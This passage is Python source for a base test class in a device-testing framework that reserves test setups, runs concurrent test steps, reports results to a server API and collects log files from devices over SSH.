total_reward","repo_name":"Deastan/envirenement_reinforcement_learning","sub_path":"environment_package/src/classes/pushing_reward.py","file_name":"pushing_reward.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41054902940","text":"import datetime\nimport json\nimport logging\nimport re\nimport sys\nimport threading\nimport time\nimport warnings\nfrom argparse import Namespace\nfrom collections.abc import Mapping\nfrom concurrent.futures import as_completed, ThreadPoolExecutor, TimeoutError\nfrom contextlib import contextmanager\nfrom distutils.util import strtobool\nfrom os import makedirs, path\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile, TemporaryDirectory\nfrom typing import Any, cast, Dict, Generator, List, Optional, Sequence, Set, Tuple\n\nfrom ctf.common.connections.SSHConnection import SSHConnection\nfrom ctf.common.constants import (\n ActionTag as _ActionTag,\n TOTAL_LOGS_DIR_NAME,\n TOTAL_LOGS_FILE_NAME,\n)\nfrom ctf.common.enums import TagLevel as _TagLevel\nfrom ctf.common.logging_utils import log_call\n\n# To avoid lint warning of unused imports\nActionTag = _ActionTag\nTagLevel = _TagLevel\n\nfrom ctf.ctf_client.lib.connections_helper import (\n create_ssh_connection as _create_ssh_connection,\n get_ssh_connection_class as _get_ssh_connection_class,\n)\nfrom ctf.ctf_client.lib.constants import TestActionStatusEnum\nfrom ctf.ctf_client.server_gateway.api_gateway import get_ctf_api\n\n# To avoid lint warning of unused import\nget_ssh_connection_class = _get_ssh_connection_class\ncreate_ssh_connection = _create_ssh_connection\n\nfrom .exceptions import DeviceCmdError, DeviceConfigError, TestUsageError\n\nlogger = logging.getLogger(__name__)\n\n# Silence this warning, as some versions of paramiko will raise\n# ResourceWarnings when connections are 
opened/closed.\nwarnings.simplefilter(\"ignore\", ResourceWarning)\n\n\nclass ThreadLocal(threading.local):\n \"\"\"\n Thread local data for ctf logs and json data.\n\n Enables test step specific logging and json data creation from\n concurrent test steps.\n\n Any thread that calls log_to_ctf() or save_ctf_json_data()\n must explicitly initialize ThreadLocal on startup - see init().\n\n Thread specific attributes:\n step_idx: int # the 1-based index of the current test step\n\n References:\n https://docs.python.org/3/library/threading.html?highlight=local#thread-local-data\n https://github.com/python/cpython/blob/master/Lib/_threading_local.py\n\n Note:\n It is possible to keep ctf logs and json data in ThreadLocal.\n\n Pro: Eliminates the mutexes that protect the ctf log and the json data\n dictionaries.\n\n Con: Harder to maintain. Threads need to dispose of their logging data\n before exiting by returning it (or possibly pushing it to CTF). Thread-creators\n need to handle the logging data of their child threads.\n \"\"\"\n\n DEFAULT_INVALID_STEP_IDX: int = -1 # Valid step indecies are positive\n initialized = False # ThreadLocal has been explicitly initialized at least once.\n\n def init(self, step_idx: int):\n \"\"\"Initialize thread local data.\n\n Pooled threads must call `init()` explicitly on start up,\n because `__init__()` is only called automatically the first\n time a thread accesses ThreadLocal.\n \"\"\"\n self.step_idx = step_idx\n ThreadLocal.initialized = True\n\n @log_call(params=False, returned=False, result=False)\n def clear(self):\n ThreadLocal.initialized = False\n\n def __init__(self, step_idx: Optional[int] = None):\n \"\"\"Initialize the thread specific dictionary\n\n Invoked automatically once per thread the first time it accesses ThreadLocal.\n \"\"\"\n\n if step_idx:\n self.step_idx = step_idx\n ThreadLocal.initialized = True\n else:\n self.step_idx = self.DEFAULT_INVALID_STEP_IDX\n\n\nclass BaseCtfTest:\n \"\"\"Base class for CTF tests.\n\n Encapsulates a typical test sequence using the CTF API.\n \"\"\"\n\n # Name of the test\n TEST_NAME: str = \"\"\n # Description of the test\n DESCRIPTION: str = \"\"\n\n # Template string holding default node data filename for this test (used\n # when not passed in as a CLI argument).\n #\n # Variable substitutions:\n # - SETUP_ID => self.test_setup_id\n NODES_DATA_FORMAT: str = \"\"\n\n # If `self.NODES_DATA_FORMAT` is set, is it optional?\n NODES_DATA_OPTIONAL: bool = False\n\n def __init__(self, args: Namespace) -> None:\n #### Task execution ####\n # Number of thread pool workers\n self.max_workers: int = int(args.max_workers)\n # Thread pool for submitting concurrent tasks *within* a test step\n # (e.g. to execute commands on multiple test devices simultaneously)\n self.thread_pool = ThreadPoolExecutor(\n thread_name_prefix=\"NodeWorkers\", max_workers=self.max_workers\n )\n\n # CTF run mode flag. 
Running in serverless mode or CTF server APIs\n self.serverless = (\n False if not args.serverless else bool(strtobool(args.serverless))\n )\n logger.info(f\"Running in serverless mode = {self.serverless}\")\n\n # Run with or without ctf server\n self.ctf_api = get_ctf_api(serverless=self.serverless) #\n\n # Configure serverless variables\n if self.serverless:\n self.ctf_api.set_serverless_config()\n\n # Default timeout period to use for each test step (in seconds)\n self.timeout: int = args.timeout\n # Default timeout period for the log file collection step (in seconds)\n self.log_collect_timeout: int = args.log_collect_timeout\n # Default timeout period to use for scp commands (in seconds)\n self.scp_timeout: int = args.scp_timeout\n # Steps to skip\n self.skip_steps: Sequence[str] = args.skip or [] if \"skip\" in args else []\n # Enable verbose ssh debug logs\n self.ssh_debug: bool = args.debug and (not args.no_ssh_debug)\n # test case config json overlay/update from the CTF UI\n self.json_args: str = args.json_args\n # Logs will be stored locally (default /tmp/ctf_logs/) in addition to CTF server. User will manage the local logs.\n self.store_logs_locally = args.store_logs_locally\n\n # Parse test-specific arguments (K=V pairs) into a Dict\n self.test_args: Dict[str, Any] = self._build_test_args(\n args.test_args if \"test_args\" in args else {}\n )\n logger.debug(f\"Using test arguments: {self.test_args}\")\n\n # Is this test run via Sandcastle (Facebook CI)?\n self.run_sandcastle: bool = args.run_sandcastle\n\n #### CTF-specific ####\n # CTF team ID\n self.team_id: int = args.team_id\n # CTF test setup ID\n self.test_setup_id: int = int(args.test_setup_id)\n # Have we acquired/reserved this test setup?\n self.setup_reserved: bool = False\n # This instance's CTF test execution ID (a.k.a. test run ID)\n self.test_exe_id: int = 0\n # Start time of the test\n self.test_start_time = int(time.time())\n # Test device information, initialized during `self.init_test_run()`\n self.device_info: Dict = {}\n\n # Map from test step index to a list of log lines\n self.ctf_logs: Dict[int, List[str]] = {}\n # Lock for thread safe logging\n # Protects: ctf_logs\n self.ctf_log_lock = threading.Lock()\n\n # Map from test step index to json data to visualize\n self.ctf_json_data: Dict[int, Dict] = {}\n # Lock for thread safe json data update\n # Protects: ctf_json_data\n self.ctf_json_data_lock = threading.Lock()\n\n # Map from test step index to keyed json object test action result objects\n self.ctf_keyed_json_objects: Dict[int, List[Dict]] = {}\n\n # Lock for thread safe keyed json objects update\n # Protects: ctf_keyed_json_objects\n self.ctf_keyed_json_objects_lock = threading.Lock()\n\n # Lock for thread safe data push to CTF\n # Protects\n # save_test_action_result()\n # save_test_action_result_json_data()\n self.ctf_push_lock = threading.Lock()\n\n # Thread-local data. 
See ThreadLocal for details.\n self.thread_local = ThreadLocal()\n\n # Logs to collect from nodes of each particular device type after each test run\n self.logfiles: Dict[str, List[str]] = {}\n\n # Safe tempdir which is available in all test steps\n # Initialized in run_test()\n self.tempdir = None\n\n # Node data for this test, holding a combination of setup-specific and\n # test-specific configuration.\n #\n # This is a map of integer node IDs (matching `self.device_info` from\n # the CTF database) to configuration objects.\n #\n # Validate some basic things early in this constructor since\n # self.nodes_data isn't loaded until after CTF test data is initialized.\n self.nodes_data: Dict = {}\n self.nodes_data_file: str = \"\"\n if args.nodes_data:\n self.nodes_data_file = args.nodes_data\n elif args.nodes_data_dir and self.NODES_DATA_FORMAT:\n f = self.NODES_DATA_FORMAT.format(SETUP_ID=self.test_setup_id)\n self.nodes_data_file = path.join(args.nodes_data_dir, f)\n if (\n not self.nodes_data_file\n and self.NODES_DATA_FORMAT\n and not self.NODES_DATA_OPTIONAL\n ):\n f = self.NODES_DATA_FORMAT.format(SETUP_ID=self.test_setup_id)\n raise TestUsageError(f\"Required node data file is missing: {f}\")\n if self.nodes_data_file and not path.isfile(self.nodes_data_file):\n err = f\"Node data file not found: {self.nodes_data_file}\"\n if self.NODES_DATA_OPTIONAL:\n logger.warning(err)\n self.nodes_data_file = \"\"\n else:\n raise FileNotFoundError(err)\n\n def cleanupThreadPool(self, pool: ThreadPoolExecutor) -> None:\n if pool:\n # error: \"ThreadPoolExecutor\" has no attribute \"_threads\"\n for pool_thread in pool._threads:\n try:\n # pyre-fixme[16]: `Thread` has no attribute `_tstate_lock`.\n if pool_thread._tstate_lock:\n pool_thread._tstate_lock.release()\n except Exception as e:\n logger.debug(f\"Problem with releasing a thread: {e}\")\n pass\n pool.shutdown(wait=False)\n\n def __del__(self) -> None:\n self.cleanupThreadPool(self.thread_pool)\n\n @staticmethod\n def test_params() -> Dict[str, Dict]:\n \"\"\"Return any test-specific parameter definitions.\n\n This is a map of parameter names to object values as follows:\n ```\n {\n \"desc\": \"\",\n \"required\": ,\n \"default\": ,\n \"convert\": \n }\n ```\n \"\"\"\n return {}\n\n def _build_test_args(self, args: Dict) -> Dict[str, Any]:\n \"\"\"Build a map of test-specific arguments.\"\"\"\n test_args: Dict[str, Any] = {}\n test_params: Dict[str, Dict] = self.test_params()\n\n # Parse CLI args\n for arg in args:\n k, v = arg.split(\"=\")\n if k not in test_params:\n raise TestUsageError(f\"Unknown test argument '{k}'\")\n test_args[k] = v\n\n # Process test param definitions\n for k, v in test_params.items():\n if k in test_args:\n if \"convert\" in v:\n test_args[k] = v[\"convert\"](test_args[k])\n else:\n if \"required\" in v and v[\"required\"]:\n raise TestUsageError(f\"Missing required test argument '{k}'\")\n test_args[k] = v[\"default\"] if \"default\" in v else None\n\n return test_args\n\n def execute(self, acquire: bool = True) -> int:\n \"\"\"Execute the test.\n\n Return zero upon success, or a non-zero value upon failure.\n \"\"\"\n with self._test_manager():\n test_methods = [self.init_test_run, self.run_test]\n if acquire:\n # pyre-fixme[6]: Expected `Union[BoundMethod[typing.Callable(BaseCtfTest....\n test_methods.insert(0, self.acquire_test_setup)\n for method in test_methods:\n # pyre-fixme[16]: Callable `init_test_run` has no attribute `__name__`.\n logger.debug(f\"[[ Running method: '{method.__name__}' ]]\")\n error = 
method()\n if error:\n return int(error)\n\n return 0\n\n def _run_test(self) -> int:\n \"\"\"Run all test steps, e.g. run_test_steps() surrounded by pre_run()\n and post_run(), among other functions.\n \"\"\"\n steps = [\n {\n \"name\": \"[ Test info ]\",\n \"function\": self.log_test_info,\n \"function_args\": (),\n \"success_msg\": \"\",\n },\n (\n {\n \"name\": \"[ Pre-run ]\",\n \"function\": lambda *a, **k: None,\n \"function_args\": (),\n \"success_msg\": \"Pre-run was skipped\",\n }\n if \"pre_run\" in self.skip_steps\n else {\n \"name\": \"[ Pre-run ]\",\n \"function\": self.pre_run,\n \"function_args\": (),\n \"success_msg\": \"Pre-run finished\",\n }\n ),\n *self.get_test_steps(),\n (\n {\n \"name\": \"[ Post-run ]\",\n \"function\": lambda *a, **k: None,\n \"function_args\": (),\n \"success_msg\": \"Post-run was skipped\",\n }\n if \"post_run\" in self.skip_steps\n else {\n \"name\": \"[ Post-run ]\",\n \"function\": self.post_run,\n \"function_args\": (),\n \"success_msg\": \"Post-run finished\",\n \"continue_on_failure\": True,\n }\n ),\n {\n \"name\": \"[ Collect logs ]\",\n \"function\": self._collect_logfiles_wrapper,\n \"function_args\": (),\n \"success_msg\": \"Log collection finished\",\n \"continue_on_failure\": True,\n \"never_fail\": True,\n },\n ]\n post_run_idx = len(steps) - 2 # post_run(), collect_logfiles()\n ret: int = self.run_test_steps(steps, post_run_idx)\n self.finish_test_run(ret)\n return ret\n\n def run_test(self) -> int:\n \"\"\"Run all test steps with a default temporary directory\"\"\"\n ret = 1\n with TemporaryDirectory(prefix=\"ctf_\") as tmpdir:\n self.tempdir = tmpdir\n ret = self._run_test()\n return ret\n\n def log_test_info(self) -> None:\n \"\"\"Log some information specific to this test run to CTF.\"\"\"\n device_list = []\n for device_id, device in self.device_info.items():\n device_list.append(\n f\"[{device_id}] {device.connection.ip_address.lower()} \"\n + f\"({device.device_type().capitalize()})\"\n )\n devices = \"\\n\".join(device_list)\n\n self.log_to_ctf(f\"Test command:\\n{' '.join(sys.argv)}\")\n self.log_to_ctf(f\"Devices:\\n{devices}\")\n\n def pre_run(self) -> None:\n \"\"\"Function to run before all test steps.\"\"\"\n pass\n\n def post_run(self) -> None:\n \"\"\"Function to run after all test steps.\"\"\"\n pass\n\n def acquire_test_setup(self, wait_time: float = 30.0) -> int:\n \"\"\"Acquire the test setup, busy-waiting if unavailable.\"\"\"\n # TODO: This polling should move to CTF itself - we should join a queue\n done = False\n while not done:\n try:\n done = self.ctf_api.set_test_setup_and_devices_busy(self.test_setup_id)\n except Exception as e:\n logger.info(\n f\"acquire_test_setup | ignoring {str(e)} raised by set_test_setup_and_devices_busy\"\n )\n if not done:\n logger.info(\n f\"Test Setup {self.test_setup_id} is not available. 
\"\n + f\" Sleeping {wait_time}s\"\n )\n time.sleep(wait_time)\n continue\n\n self.setup_reserved = True\n logger.debug(f\"Acquired test setup {self.test_setup_id}\")\n return 0\n\n def free_test_setup(self) -> None:\n \"\"\"Release the test setup.\"\"\"\n if self.setup_reserved:\n self.ctf_api.set_test_setup_and_devices_free(self.test_setup_id)\n self.setup_reserved = False\n\n def resource_cleanup(self) -> None:\n \"\"\"Test resource cleanup\"\"\"\n # Free the test setup if needed\n if self.setup_reserved:\n self.free_test_setup()\n\n def init_test_run(self) -> int:\n \"\"\"Set up the CTF run.\n\n Returns a non-zero integer upon error.\n \"\"\"\n # Get the configuration\n self.device_info = self.ctf_api.get_test_setup_devices_and_connections(\n test_setup_id=self.test_setup_id,\n )\n if not self.device_info:\n logger.error(\n f\"Unable to get device info for test setup {self.test_setup_id}\"\n )\n return 10\n logger.debug(f\"device_info: {self.device_info}\")\n\n # Set ssh logging verbosity and disable sftp\n for device in self.device_info.values():\n if isinstance(device.connection, SSHConnection):\n device.connection.enable_verbose_logs(self.ssh_debug)\n device.connection.enable_sftp(False)\n\n self.test_start_time = int(time.time())\n result = self.ctf_api.create_test_run_result(\n name=self.TEST_NAME,\n identifier=str(int(time.time())),\n description=self.DESCRIPTION,\n team_id=self.team_id,\n test_setup=self.test_setup_id,\n )\n logger.debug(f\"Got test run result: '{result}'\")\n test_exe_details = result.get(\"data\")\n if not test_exe_details:\n logger.error(f\"Did not receive test run data: '{test_exe_details}'\")\n return 11\n\n self.test_exe_id = test_exe_details.get(\"id\")\n if not self.test_exe_id:\n logger.error(f\"Unable to get test_exe_id: {self.test_exe_id}\")\n return 12\n\n self.post_test_init()\n\n return 0\n\n def post_test_init(self) -> None:\n \"\"\"Function called after init_test_run(), when all test data should be\n initialized.\n \"\"\"\n self.nodes_data = self._load_nodes_data(self.nodes_data_file)\n\n def get_test_steps(self) -> List[Dict]:\n \"\"\"Return a list of test steps to be executed in run_test_steps().\n\n Each step must be an object with the following structure:\n ```\n {\n \"name\": \"\",\n \"function\": ,\n \"function_args\": (),\n \"success_msg\": \"\",\n \"concurrent\": ,\n \"delay\": ,\n \"post_delay\": ,\n \"error_handler\": [\n {\n \"function\": ,\n \"function_args\": (),\n }\n ],\n \"continue_on_failure\": ,\n \"negate_result\": ,\n \"never_fail\": \n }\n ```\n \"\"\"\n return []\n\n def get_meta_data_for_step(self, step: Dict) -> List[Dict]:\n \"\"\"\n Use this to get ActionTags and logfiles which needs to be recorded with step.\n Returns data in below format which includes\n 1. list of error tags (referred as action tags in CTF) which will be hooked to action.\n 2. List of log files for each node_id which will be saved under CTF action\n 3. Function to call for cleanup of logs after logs are pulled\n 4. Args for the above function\n {\n \"tags\": List[ActionTag],\n \"logs\": Dict[int, List],\n \"logs_cleanup_fn\": ,\n \"logs_cleanup_fn_args\": ()\n }\n \"\"\"\n return []\n\n def _run_test_step(self, step: Dict, step_idx) -> int:\n \"\"\"Run one test step and report result to CTF.\n\n Note: `step_idx` is 1-based\n Returns 0 on success, `step_idx` otherwise\n \"\"\"\n\n # We are in a new thread. 
Publish step_idx in thread local data.\n self.thread_local.init(step_idx)\n\n step_start = datetime.datetime.now()\n logger.info(f\"[Step {step_idx}] {step['name']}\")\n step[\"start_time\"] = datetime.datetime.utcnow()\n\n # Delay\n delay_sec = step.get(\"delay\", 0)\n if delay_sec > 0:\n self.log_to_ctf(\n f\"Delaying step {step_idx} {step['name']} for {delay_sec} s\"\n )\n time.sleep(delay_sec)\n\n # Run the test step\n step_outcome: int = 0 # 0=success, otherwise failed step_idx\n try:\n step[\"function\"](*step[\"function_args\"])\n if step[\"success_msg\"]:\n self.log_to_ctf(step[\"success_msg\"], \"info\")\n except Exception as e:\n step_outcome = step_idx\n err_msg = f\"Failed to run step [{step['name']}]: {e} ({type(e)})\"\n logger.exception(err_msg)\n self.log_to_ctf(err_msg, \"error\")\n\n # Negate step result\n if step.get(\"negate_result\", False):\n if step_outcome == 0:\n step_outcome = step_idx\n else:\n step_outcome = 0\n self.log_to_ctf(\n f\"Test step {step_idx} result negated to {step_outcome}\", \"info\"\n )\n\n # Find the test action outcome code for CTF\n never_fail: bool = step.get(\"never_fail\", False)\n if step_outcome == 0:\n reported_outcome = TestActionStatusEnum.SUCCESS\n elif never_fail:\n reported_outcome = TestActionStatusEnum.WARNING\n else:\n reported_outcome = TestActionStatusEnum.FAILURE\n\n # Post Delay\n post_delay_sec = step.get(\"post_delay\", 0)\n if post_delay_sec > 0 and (\n step.get(\"continue_on_failure\", False) or never_fail or step_outcome == 0\n ):\n self.log_to_ctf(\n f\"Waiting for {post_delay_sec}s after executing step {step_idx} {step['name']}\"\n )\n time.sleep(post_delay_sec)\n\n # Get log files and tags for this step\n step_meta_data = self.get_meta_data_for_step(step=step)\n\n # Filter tags and log files from the step_meta_data\n error_tags = []\n log_files: Dict[int, List] = {}\n for meta_data in step_meta_data:\n error_tags.extend(meta_data.get(\"tags\", []))\n if \"logs\" in meta_data:\n self.merge_dict_of_lists(log_files, meta_data[\"logs\"])\n\n # Get the CTF logs for the current step.\n with self.ctf_log_lock:\n ctf_logs = self.ctf_logs.get(step_idx, [])\n\n # Save the action result\n # TODO: Return `action_result` to avoid ctf_push_lock\n with self.ctf_push_lock:\n action_result = self.ctf_api.save_test_action_result(\n test_run_id=self.test_exe_id,\n description=step[\"name\"],\n outcome=reported_outcome,\n logs=\"\\n\".join(ctf_logs),\n start_time=step_start,\n end_time=datetime.datetime.now(),\n step_idx=step_idx,\n tags=error_tags,\n )\n logger.debug(f\"Recorded test action result: {action_result}\")\n\n test_action_result_id = action_result[\"data\"][\"test_action_result_id\"]\n\n # Get the CTF json data\n with self.ctf_json_data_lock:\n ctf_json_data = self.ctf_json_data.get(step_idx, {})\n\n # Save CTF Json Data\n if len(ctf_json_data) > 0:\n with self.ctf_push_lock:\n save_json_data_result = self.ctf_api.save_test_action_result_json_data(\n test_action_result_id=test_action_result_id,\n ctf_json_data_all=json.dumps(ctf_json_data),\n )\n logger.debug(f\"Recorded CTF JSON data: {save_json_data_result}\")\n\n # Get the Test Action Result with key\n with self.ctf_keyed_json_objects_lock:\n ctf_keyed_json_objects = self.ctf_keyed_json_objects.get(step_idx, {})\n\n # Save Test Action Result Key Json Objects\n if len(ctf_keyed_json_objects) > 0:\n with self.ctf_push_lock:\n for test_action_result_key in ctf_keyed_json_objects:\n save_test_action_result_keyed_json = (\n 
self.ctf_api.save_test_action_result_keyed_json_object(\n self.test_exe_id,\n test_action_result_id,\n test_action_result_key[\"key\"],\n test_action_result_key[\"json_object\"],\n team_id=self.team_id,\n )\n )\n logger.debug(\n f\"Recorded CTF Test Action Result key JSON: {save_test_action_result_keyed_json}\"\n )\n\n # Pull the log files from node and push to CTF\n self.collect_logfiles_for_action(log_files, test_action_result_id)\n # Use this method to do any post processing\n self.secondary_step_action(test_action_result_id, step)\n\n # Run the logs_cleanup_fn\n for meta_data in step_meta_data:\n try:\n if \"logs_cleanup_fn\" in meta_data:\n meta_data[\"logs_cleanup_fn\"](*meta_data[\"logs_cleanup_fn_args\"])\n except Exception as e:\n err_msg = f\"Failed to handle logs_cleanup_fn [{step['name']}]: {e} ({type(e)})\"\n logger.exception(err_msg)\n self.log_to_ctf(err_msg, \"error\")\n\n ret_val: int = step_outcome\n if never_fail:\n ret_val = 0\n logger.debug(\n f'step:{step[\"name\"]} never_fail:{never_fail} step_outcome:{step_outcome} return:{ret_val}'\n )\n return ret_val\n\n def secondary_step_action(self, test_action_result_id: int, step: Dict) -> None:\n \"\"\"Use this method to do any post processing after the step result is saved on CTF\"\"\"\n return\n\n def _get_max_concurrent_steps(self, steps: List[Dict]) -> int:\n \"\"\"Get the max number of concurrent thread steps\"\"\"\n max_concurrent: int = 1\n concurrent: int = 0\n idx: int = 0\n while idx < len(steps):\n if \"concurrent\" in steps[idx]:\n concurrent = concurrent + 1\n else:\n max_concurrent = max(concurrent, max_concurrent)\n concurrent = 0\n idx = idx + 1\n logger.debug(f\"Max number of concurrent test steps = {max_concurrent}\")\n return max_concurrent\n\n def run_test_steps(\n self, steps: List[Dict], post_run_idx: Optional[int] = None\n ) -> int:\n \"\"\"Run a list of test steps and report each result to CTF.\n\n See get_test_steps() for the expected data format.\n\n If any step fails, this will abort and return with the step number\n (1-indexed) that failed. 
Otherwise, this returns 0 upon success.\n\n If `post_run_idx` is provided, steps starting at this index (0-based)\n will always be run.\n \"\"\"\n\n logger.info(f\"**** Starting test: '{self.TEST_NAME} - {self.DESCRIPTION}' ****\")\n\n # Create a thread pool for the concurrent test-steps\n max_step_workers: int = self._get_max_concurrent_steps(steps)\n step_thread_pool = ThreadPoolExecutor(\n thread_name_prefix=\"TestStepWorkers\", max_workers=max_step_workers\n )\n\n idx: int = 0 # 0-based index into \"steps\"\n test_outcome: int = 0 # 0=success, otherwise (index of first failed step + 1)\n futures: Dict = {}\n while idx < len(steps):\n # Run the next concurrent test-step group\n futures.clear()\n done: bool = False\n while not done:\n futures[\n step_thread_pool.submit(\n self._run_test_step, step=steps[idx], step_idx=idx + 1\n )\n ] = idx\n if (\n steps[idx].get(\"concurrent\", False)\n and (idx + 1) < len(steps)\n and steps[idx + 1].get(\"concurrent\", False)\n ):\n idx = idx + 1\n else:\n done = True\n\n # Wait for completion of the futures in the test-step group\n first_failed_idx: int = -1\n error_handler_idx: int = -1\n group_continue_on_failure: bool = True\n\n for future in as_completed(futures.keys()):\n result = future.result()\n completed_idx = futures[future]\n if result != 0:\n if first_failed_idx == -1:\n first_failed_idx = completed_idx\n test_outcome = first_failed_idx + 1\n step = steps[completed_idx]\n if (\n error_handler_idx == -1\n and \"error_handler\" in step\n and len(step[\"error_handler\"]) > 0\n ):\n # First failed step in the concurrent group with an error_handler\n error_handler_idx = completed_idx\n if not steps[completed_idx].get(\"continue_on_failure\", False):\n group_continue_on_failure = False\n\n # Insert an error handler and skip the the rest of the steps when\n # (1) Any step from the concurrent group has failed --AND--\n # (2) continue_on_failure is false for *any* failed step in the group --AND--\n # (3) The concurrent \"group\" was not the post_run\n # The inserted error handler is the first failed test from the\n # concurrent group that has an error handler.\n if (\n first_failed_idx >= 0\n and not group_continue_on_failure\n and post_run_idx is not None\n and idx < post_run_idx\n ):\n idx = post_run_idx - 1\n if error_handler_idx >= 0:\n step = steps[error_handler_idx]\n logger.info(\n f\"**** Inserting error handler for failed step {error_handler_idx+1} ****\"\n )\n steps.insert(\n post_run_idx,\n {\n \"name\": \"[ Error handler ]\",\n \"function\": self._run_error_handler,\n \"function_args\": (step[\"error_handler\"],),\n \"success_msg\": \"Error handler finished.\",\n },\n )\n\n idx = idx + 1\n\n self.cleanupThreadPool(step_thread_pool)\n\n return test_outcome\n\n def _run_error_handler(self, error_handler: List[Dict]) -> None:\n \"\"\"Run all functions in the given error handler sequentially.\"\"\"\n for obj in error_handler:\n obj[\"function\"](*obj[\"function_args\"])\n\n def get_dashboard_links(self) -> List[Dict]:\n \"\"\"Return list of dashboard links which will be hooked to test run result\n Dashboard links will be used to show on TestRunResult page.\n\n CTF accepts dashboard details in below format:\n [{\"label\":\"Grafana\" ,\"link\":\"http://grafana/dashboard\"}]\n \"\"\"\n return []\n\n def finish_test_run(self, test_outcome: int) -> int:\n \"\"\"Mark the CTF test run as finished.\"\"\"\n test_status = \"Test PASSED\"\n # test_outcome is 0 for pass else it is the failed step id\n if test_outcome != 0:\n test_status = f\"Test 
FAILED at step {test_outcome}\"\n logger.info(f\"*** {test_status} ***\")\n\n dashboard_details = self.get_dashboard_links()\n test_result = self.ctf_api.save_test_run_outcome(\n test_run_id=self.test_exe_id,\n dashboard_details=dashboard_details,\n test_status=test_outcome,\n )\n logger.info(f\"**** {test_result['message']}! ****\")\n test_url = self.test_url()\n if not self.serverless:\n logger.info(f\"Test ID {self.test_exe_id} finished: {test_url}\")\n if self.run_sandcastle and not self.serverless:\n pass_fail_symbol = \"\\u2705\" if test_outcome == 0 else \"\\u274e\"\n label = f\"CTF {self.test_exe_id} {pass_fail_symbol}\"\n logger.info(f\"SANDCASTLE|addLink|{label}|{test_url}\")\n\n # Disconnect from all devices\n for device in self.device_info.values():\n device.connection.disconnect() # TODO Introduce disconnectAllThreads()\n\n return 0\n\n def test_url(self) -> str:\n \"\"\"Return a URL to access test results (after `self.init_test_run()`).\"\"\"\n # TODO replace this when added to CTF API\n if self.test_exe_id:\n return f\"https://internalfb.com/intern/bunny/?q=ctf+{self.test_exe_id}\"\n else:\n return \"\"\n\n def _collect_logfiles_wrapper(self) -> None:\n \"\"\"Call `collect_logfiles()` with `self.logfiles`.\"\"\"\n # needed to allow subclasses to modify self.logfiles\n self.collect_logfiles(self.logfiles)\n\n def collect_logfiles(self, logfiles: Dict[str, List[str]]) -> None:\n \"\"\"Collect any requested log files from the test devices and submit\n them to CTF.\n \"\"\"\n if not logfiles:\n self.log_to_ctf(\"No log files to collect.\", \"info\")\n return\n\n self.log_to_ctf(f\"Collecting log files: [{logfiles}]\", \"info\")\n\n futures: Dict = {}\n for node_id, device in self.device_info.items():\n if device.device_type() in logfiles and logfiles[device.device_type()]:\n futures[\n self.thread_pool.submit(\n self._fetch_and_submit_logfiles,\n node_id,\n device.connection,\n logfiles[device.device_type()],\n self.thread_local.step_idx,\n )\n ] = node_id\n\n failed_nodes = []\n for future in as_completed(futures.keys(), timeout=self.log_collect_timeout):\n result = future.result()\n node_id = futures[future]\n if result:\n self.log_to_ctf(\n f\"Node {node_id} finished fetching and pushing log files\"\n )\n else:\n failed_nodes.append(node_id)\n self.log_to_ctf(\n f\"Failed to collect log files from node {node_id}\", \"error\"\n )\n\n if failed_nodes:\n raise DeviceCmdError(\n f\"Errors were raised during log collection on {len(failed_nodes)} \"\n + f\"node(s): {sorted(failed_nodes)}\"\n )\n\n def collect_logfiles_for_action(\n self,\n logfiles: Dict[int, List[str]],\n test_action_result_id: int,\n ) -> None:\n \"\"\"Collect any requested log files from the test devices and submit\n them to CTF action log.\n \"\"\"\n if not logfiles:\n self.log_to_ctf(\n f\"No log files to collect for action {test_action_result_id}\", \"info\"\n )\n return\n\n if not test_action_result_id:\n raise TestUsageError(\"Missing Action result id\")\n\n self.log_to_ctf(\n f\"Collecting log files for action {test_action_result_id}: [{logfiles}]\",\n \"info\",\n )\n\n futures: Dict = {}\n for node_id, device in self.device_info.items():\n if logfiles.get(node_id, None):\n futures[\n self.thread_pool.submit(\n self._fetch_and_submit_logfiles,\n node_id,\n device.connection,\n logfiles[node_id],\n self.thread_local.step_idx,\n test_action_result_id,\n )\n ] = node_id\n\n failed_nodes = []\n for future in as_completed(futures.keys(), timeout=self.log_collect_timeout):\n result = future.result()\n node_id = 
futures[future]\n if result:\n self.log_to_ctf(\n f\"Node {node_id} finished fetching and pushing log files\"\n )\n else:\n failed_nodes.append(node_id)\n self.log_to_ctf(\n f\"Failed to collect log files from node {node_id}\", \"error\"\n )\n\n if failed_nodes:\n raise DeviceCmdError(\n f\"Errors were raised during log collection on {len(failed_nodes)} \"\n + f\"node(s): {sorted(failed_nodes)}\"\n )\n\n def _fetch_and_submit_logfiles(\n self,\n node_id: int,\n connection: SSHConnection,\n logfiles: Tuple[str, ...],\n step_idx: Optional[int] = None,\n test_action_result_id: Optional[int] = None,\n ) -> bool:\n \"\"\"Collect the requested log files and submit them to CTF.\n If test_action_result_id is mentioned save logs against given action else\n save logs for test run\"\"\"\n\n if step_idx:\n # We are in a new thread. Publish step_idx in thread local data.\n # See also: ThreadLocal\n self.thread_local.init(step_idx)\n\n try:\n connection.connect()\n except Exception as e:\n self.log_to_ctf(\n f\"Connection failed to {connection.ip_address}: {str(e)}\", \"error\"\n )\n raise\n\n result: Dict = {}\n success: bool = True\n if self.store_logs_locally:\n local_dir = path.join(\n self.store_logs_locally, str(self.test_exe_id), str(node_id)\n )\n makedirs(local_dir, exist_ok=True)\n else:\n tmp_dir = TemporaryDirectory(prefix=\"logfiles-\")\n local_dir = tmp_dir.name\n\n for logfile in logfiles:\n # Fetch log file from test device\n self.log_to_ctf(f\"Fetching {logfile} to local dir: {local_dir}\")\n if not self.fetch_file(connection, local_dir, logfile, recursive=True):\n success = False\n # attempt to reconnect and try to fetch the next file\n try:\n connection.connect()\n except Exception as e:\n self.log_to_ctf(\n f\"Connection failed to {connection.ip_address}: {str(e)}\",\n \"error\",\n )\n continue\n\n # Push to CTF\n local_path = Path(f\"{local_dir}/{Path(logfile).name}\")\n # use step to form log destination path\n step = f\"step_{step_idx}_\" if step_idx else \"\"\n if local_path.is_dir():\n dest_path = (\n f\"{node_id}/{step}{test_action_result_id}{logfile}\"\n if test_action_result_id\n else f\"{node_id}{logfile}\"\n )\n for f in local_path.glob(\"*\"):\n if f.is_file():\n self.log_to_ctf(f\"Pushing {f} to CTF path: {dest_path}\")\n if test_action_result_id:\n result = self.ctf_api.save_action_log_file(\n source_file_path=f,\n constructive_path=dest_path,\n test_exe_id=self.test_exe_id,\n test_action_result_id=test_action_result_id,\n )\n else:\n result = 